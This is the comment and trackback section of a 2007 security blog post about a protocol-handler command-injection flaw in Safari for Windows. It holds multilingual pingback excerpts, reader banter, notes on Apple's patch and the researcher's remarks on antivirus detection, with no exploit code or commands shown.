[...] Sicherheitsexperte Thor Larholm berichtet einer News von Golem.de zufolge von einem schweren Sicherheitsloch in der Windows-Version von Safari. Der Sicherheitsexperte Aviv Raff hat einen weiteren Fehler in [...]
[...] ? ?????????? ???????????. ??? ???????? (Thor Larholm) ????????? ????????, ??????????? ????????????? ??????? Safari ?? ?????, [...]
give em hell buddy!!….there are so many holes in the product that some HaXo4 is probably already resetting a botnet to climb into a bigger cave!!…so sad so sad…as a beta it will just bring more attention to the numerous holes in the rest of the product line….oh well guess they join the real world now hahaha….on the flip side what the hell are us vars who gotta support el customero numero uno supposed to do?? nice shiny products that sell well but do not work as promised are all too common in this industry as a whole….good work.
[...] both a stack corruption and an access violation, and then giving credit to Thor Larholm for posting a complete report on the calamity not an hour [...]
[...] Safari 3, en su version para Micro$oft Window$, ya ha sido reventado. En solo dos horas, Thor Larhom, pudo lograr ejecutar código malicioso (arbitrario) en la maquina local. El atacante, podría ser [...]
[...] recently reported about Safari’s vulnerability wherein Thor Larholm published his exploits on the browser; while David Maynor found 6 bugs and 4 Denial of Service and 2 remote [...]
to those that keep regurgitating the “software running on winblows will allays be unsecure” line without thinking…
any OS that allows a user to execute arbitrary code is insecure (and any other OS is useless)… regardless of any poor security design that windows may have!
I use linux and i could “pwn” (as the kids say) hundreds of other linux users pretty easily by getting them to naively run my latest and greatest software or add my repository to their sources list. Windows will always be at a disadvantage by having, how shall I put this, the lowest common denominator of user.
The programmers at Microsoft made certain design decisions when they created Windows and whether you agree with them or not, that is the operating system you are programming for. If you fail to implement your own security you’re either lazy, arrogant or (most likely) simply overlooked it by mistake. If you don’t implement security because you don’t like the operating system and think it is inherently secure then, in my opinion, you just abandoned any moral-high ground.
Has this been fixed in the latest Safari (3.0.1?)
It doesn’t crash any more - still starts Firefox, but I can’t tell - the ‘exploit’ didn’t seem to do anything anyway under 3.0.
[...] Safari for Windows, 0day exploit in 2 hours [...]
[...] Eine detaillierte Beschreibung des Exploits und eine Testseite ist unter dem folgenden Link zu erreichen: Safari für Windows - der 2 Stunden Exploit [...]
[...] Version allerdings nur drei, anscheinend von Apple selber gefundene Sicherheitslücken. Die von Thor Larholm, Aviv Raff und David Maynor entdeckten Lücken wurden aber offensichtlich noch nicht [...]
[...] Aviv Raff , David Maynor, and Thor Larholm all reported flaws in the browser shortly after it was made available on Monday. Maynor alone said [...]
[...] doesn’t offer anything that Firefox doesn’t have for Windows. Also judging from the security exploits that have already been released, it appears as though Apple has something to learn about developing browsers on Windows. [...]
[...] Lücken geschlossen, leider weiterhin offen sind folgende Sicherheitslücken: Lücke im Protokoll-Handler, unklar ist zur Zeit noch ob die von Aviv Raff und David Maynor entdeckten Bugs geschlossen [...]
when i installed Safari on my 64bit windows machine at work… All of the text - the browser main menus, dropdowns, the actual website content text, everything text basically - was being displayed as short 1px lines. not even the length of each word, all the same length.
So, utterly unusable, i couldn’t get past that first hurdle.
I assume something to do with the 64bit thing.. (?)
[...] numerous security (1,2) concerns regarding Safari 3 on Windows, Apple has released an update to Safari fixing these [...]
[...] Security expert Thor Larholm claims he needed just two hours to create an exploit for a bug in Safari allowing him to start [...]
[...] has issued an update to Safari for Windows. According to Macworld, the update addresses a number of security issues: The security improvements in Safari Beta 3.0.1 include correction for a “command injection [...]
[...] releasing the Safari web browser earlier this week, and after security researchers quickly tore it apart, Apple releases a patched update. Bravo! It’s nice to see Apple quickly patch their [...]
i’am really impressed!!
[...] who were gleefully picking apart Safari for Windows in search of bugs. My reporting led me to the blog of Larholm, who was among the Safari flaw [...]
Very insightful. And surely even if something is in “public beta” is shouldn’t crash doing very basic things. I mean if one of my friends asked me to test a program he was working on and it crashed everytime i opened a menu or saved it i’d just send it back until he fixed the basics. Beta’s should have dogey graphics but sound code not the otherway round.
And to all you mac fan boys out there, its rubish like this coupled with the those annoying “mac is better than pc” adds and your holier than thou routine that stop me from even considering a mac or OSX as an OS. At least linux users will happily point out their own flaws and then give help to newbs in fixing them.
And to the person who said itunes was good, (not sure if it was this blog or another one) you know it uses more resources than WMP with reduced compatability for 3rd parties. Plus its demand to be tied in with quick time and the istore give me a serious head ache.
[...] Ju? w kilka godzin po pojawieniu si? “publicznej beta” pojawi?y si? pierwsze exploity o charakterze krytycznym. Jeden z nich zosta? opisany tutaj: http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ [...]
[...] ???????? ????????? ?? pede65 ???… [...]
[...] Larholm wrote a PoC exploit in just 2 hours, and shared his method and thoughts in “Safari for Windows, 0day exploit in 2 hours“. The attack can use an installed Firefox application and the Gopher URL protocol (other [...]
[...] for Windows is already in 3.0.1. No, they didn’t fix this flaw, they fixed the other one. Nonetheless, I’m [...]
[...] ????????? ??? ???????? (Thor Larholm) ? ?????? ????? ??????????? ?????? ????, ????????? ????? ? Safari 3.0 ????????? ?? ??????? [...]
Here is another one bug
http://lostmon.blogspot.com/2007/06/safari-301-552122-for-windows.html
So it wasn’t thier best software release ever, althouhg let’s remember it’s a beta. At least the intro was cool: http://thenewsroom.com/details/394435?c_id=wom-bc-js
[...] hours of launch, many users (notably, Thor Larholm and David Maynor, see their fuzzing findings at Thor’s Website) had discovered errors in the Safari programming. Just today, Apple launched a patch for the beta [...]
[...] Protocol Handler issue reported by Thor Larholm, CVE-2007-3186 [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] (his exploit also exists in Safari 2.0.4 on OSX), next was Aviv Raff’s, and last was Thor Larholm’s. Didn’t Steve Jobs say Safari was the best web browser in the world in his iPhone speech? [...]
[...] Safari for Windows, 0day exploit in 2 hours Episode #004 [26:23m]: Play Now | Play in Popup | Download [...]
[...] además verán facilitado su trabajo gracias a la inclusión de Safari -que ya ha demostrado ser tan vulnerable como cualquier otro navegador- y el correo basado en HTML en el [...]
[...] 3 beta release, several major security vulnerabilities were already discovered. Security researcher Thor Larholm posted on his blog, “I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and [...]
[...] Apple Safari Internetbrowser für Windows zum Download. Allerdings gab es die letzte Zeit einige Bugs in der Windows-Version, die ein Sicherheitsrisiko darstellten. Ein nicht so toller Start für den [...]
The thing with This Link is that my Virus Scanner blocks it
[...] In going through the exploit, interesting, lots of work went into this, and I seriously doubt that they notified apple, so the usual disclosure route was not pushed out here. The way that they have stepped through the exploit, it looks plausible, but the test POC would have to be modified to make it malicious. Give the hackers about maybe 10 seconds to flip it around, and safari, and your PC no longer are yours. The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release. Source: Larholm [...]
NightKev, a number of AV companies have added detection for this attack vector.
According to virusscan.jotti.org the exploit is identified as “Trojan.Exploit.Html.Ffox.B” by ArcaVir, F-Secure Anti-Virus and Kaspersky Anti-Virus.
On the other hand, the exploit is not detected by A-Squared, AntiVir, Avast, AVG Antivirus, BitDefender, ClamAV, Dr.Web, F-Prot Anti-Virus, Fortinet, NOD32, Norman Virus Control, Panda Antivirus, Rising Antivirus, Sophos Antivirus, Virusbuster or VBA32.
Regards
Thor Larholm
[...] Internet Explorer 0day Exploit By Thor Larholm There is an input validation flaw in Internet Explorer that allows you to specify arbitrary arguments to the process responsible for handling URL protocols. This is the same type of input validation vulnerability that I discovered in the Safari 3 beta (see “Safari for Windows, 0day exploit in 2 hours“). [...]
[...] the zero-day exploit of Safari for Windows noted last month, and also discussed at MacOSXHints, the breach deals with a ‘URL handler‘, which allows [...]
[...] the zero-day exploit of Safari for Windows noted last month and also discussed at MacOSXHints, the breach deals with a ‘URL handler‘, which allows the [...]
[...] Thor’s post on Safari (windows) 0-day caused by improper URI handling [...]
I just came back to this because I discovered, during the recent buzz over the same kind of issue in IE in Firefox, that URIs passed to protocol handlers are actually meant to be unescaped.
So my previous conclusion in comment #135 is wrong: this issue is (was) squarely on Firefox!
[...] danez Thor Larholm a fost printre cei care au raportat o problem? în nou? versiune a Safari. Acesta sus?ine c? a [...]
[...] danez Thor Larholm a fost printre cei care au raportat o problem? în nou? versiune a Safari. Acesta sus?ine c? a [...]
[...] on this one, don’t think Safari doesn’t suffer from similar problems with security. Larholm.com found a security vulnerability in Safari 3 for Windows within 2 hours of it being launched by Apple [...]
[...] Safari for Windows, 0day exploit in 2 hours Source: Larholm.com [...]
[...] Safari hasn’t even made any impact, even with its attempt to push into the Windows market. Perhaps part of Safari’s problems are the immediate and embarrassing security issues that were uncovered within 2 hours of it’s download by Lar Holm. [...]
[...] speaking, this has not been a threat to a lot of people. Unlike the Safari 3.0 release for Windows, which received millions of end user installations after being featured [...]
I find it amusing that a security flaw discovered by Mr Larholm has an effect of an ego hit to the immature apple fanboyz.
Yeah. Windows versions has lots of bugs that are fixed after some time. Like this one, found recently:
Safari: submit, back, submit… ooops
[...] June 13th: Apparently there have already been several vulnerabilities found in [...]